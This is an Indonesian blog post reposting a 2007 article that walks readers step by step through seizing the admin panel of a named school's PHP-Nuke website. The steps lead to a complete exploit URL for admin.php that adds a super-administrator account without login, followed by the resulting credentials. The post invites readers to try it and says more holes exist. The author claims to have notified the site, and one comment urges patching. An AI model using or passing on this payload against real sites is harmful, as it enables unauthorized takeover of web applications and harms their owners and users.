SMAN 78 yang Malang!!

Beberapa minggu lalu salah satu anggota Crew gw,, saat sholat jumat ngasih tau ke gw kalo dari berita yang post di http://www.jasakom.com bahwa web http://www.sman78.com punya kelemahan yang sangat fatal yakni pada Server PHP – Nuke-nya yang dodol alias gak diperhatikan untuk lebih jelasnya bisa diliat di bawah ini:

 

posted by jasakom.com

 

FATAL SQL INJECTION WEBSITE SMAN78.COM
Date: Thursday, March 08, 2007 Hits: 9288 By: kuyabatok
Sebelum saya menulis lebih jauh di artikel ini, bahwa saya sudah memberi tahu sampai 3x viaemail kepada admin website SMUN 78 Jakarta tentang vulnerabilities yang ada pada website yang dibangun dengan PHP Nuke tersebut.

Agar kejadian ini bisa di jadikan sebagai pelajaran bagi webmaster website

SMUN 78 Jakarta agar tidak teledor

dalam membangun website, terlebih lagi, website yang dibangun adalah website s

ebuah SMU Negeri Favorit di Jakarta.

 

Berdasarkan data dari Mr WHOIS, didapatkan bahwa domain sman78.com sudah ada

sejak 17 May 2005.

 

Vulnerabilities yang terdapat pada website SMUN 78 Jakarta ini masuk dalam kategori

SANGAT BERBAHAYA karena memungkinkan penyusup untuk membuat admin dan password

baru tanpa perlu login sama sekali. Sebenarnya lubang ini adalah lubang yang memang

udah lama banget dan menjadi lubang paling berbahaya bagi phpnuke. Tp bodohnya,

sang admin sama sekali gak cari info tentang kelemahan phpnuke versi jadul (red: jaman dulu) y

g dia pakai.

OK, langsung aja bro, begini step2nya:

1. siapkan kopi/teh/susu hangat plus permen karet, biar relax gitu lox

2. buka browser kesayangan anda, misalnya Internet Explorer

3. ketikkan www.sman78.com di address browser anda, maka akan muncul halaman muka

website SMUN 78 Jakarta sbb:

 

Dari tampilan depan web ini, ketahuan banget bahwa si webmaster males untuk bikin theme baru

or gak kreatif,

masa template standard phpnuke di jiplak abis.. theme yg digunakan adalah

theme “Odyssey”, keliatan dari source codenya (klik kanan, View Source)

4. Sekarang kita masuk ke login page nya di www.sman78.com/admin.php

Dari gambar terlihat bahwa dibutuhkan ID Admin dan Password untuk masuk ke halaman admin.

5. Saatnya membuat account admin sendiri, copy link berikut ke address browser anda, lalu klik GO:

 

http://www.sman78.com/admin.php?op=AddAuthor&add_aid=kuya&add_name=
God&add_pwd=batok&add_email=kuya@batok.
com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


Walaupun tidak terjadi reaksi apa2 saat anda akses link di atas via browser, tp ternyata system telah menambahkan account admin baru dengan info sbb:

 

ID Admin: kuya

Password: batok

Email : kuya@batok.com

 

Nah sekarang kita bisa login ke admin page dengan menggunakan

ID Admin dan Password tersebut, jika anda beruntung dan si webmaster

belum menutup lubang ini, maka anda akan masuk ke admin page spt ini:

 

Kenapa bisa begitu? Hal ini adalah masalah sql injection classic banget di php nuke..

Selain lubang yg ada pada admin.php, masih banyak lubang lainnya. Selamat mencoba.

 

Thankz to: me

 

About sugoistanley

Me is just another ordinary boy in this world....Iam not a hacker but i believe someday I Will...

Posted on April 3, 2007, in Hacking. Bookmark the permalink. 1 Comment.

  1. yup! sql injection di admin.php. mestinya di-patch dolo… liat di http://www.doktertomi.com

    thx

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s